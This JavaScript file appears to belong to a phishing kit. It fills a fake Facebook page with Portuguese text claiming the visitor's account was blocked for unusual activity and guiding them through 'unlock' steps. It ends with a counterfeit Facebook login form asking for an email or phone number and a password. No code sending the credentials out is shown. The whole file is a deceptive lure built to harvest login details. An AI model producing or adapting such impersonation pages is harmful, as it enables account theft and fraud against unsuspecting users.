var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");


mainHeader.innerHTML ="Sua conta foi bloqueada";
mainParagraph.innerHTML ="Vimos atividade incomum em sua conta. Isso pode significar que alguém usou sua conta sem o seu conhecimento.";
lockedHeader.innerHTML ="Conta bloqueada em 10 de novembro de 2021";
lockedParagraph.innerHTML ="Para protegê-lo, seu perfil não é visível para as pessoas no Facebook e você não pode usar sua conta.";
footerParagraph.innerHTML ="Vamos guiá-lo por algumas etapas para desbloquear sua conta.";
getStarted.innerHTML ="iniciar";
nextHeader.innerHTML ="Como desbloquear sua conta";
fristLineHeader.innerHTML ="Confirme se esta é sua conta";
fristLineParagraph.innerHTML ="Como outra pessoa pode ter tido acesso, precisamos confirmar que você é o proprietário desta conta antes de prosseguirmos.";
secoundLineHeader.innerHTML ="Proteja seus dados de login";
thirdLineHeader.innerHTML ="Sua conta será desbloqueada";
nextButton.innerHTML ="Próximo";
backButton.innerHTML ="Voltar";
logHeading.innerHTML ="Entrar no Facebook";
logAlert.innerHTML ="Você precisa fazer o login primeiro";
logAlert2.innerHTML ="Você precisa fazer o login primeiro";
userInput.setAttribute("placeholder" , "Endereço de e-mail ou número de telefone");
passInput.setAttribute("placeholder" , "Senha");
logButton.innerHTML ="Conecte-se";
or.innerHTML ="ou";
createButton.innerHTML ="Criar nova conta";
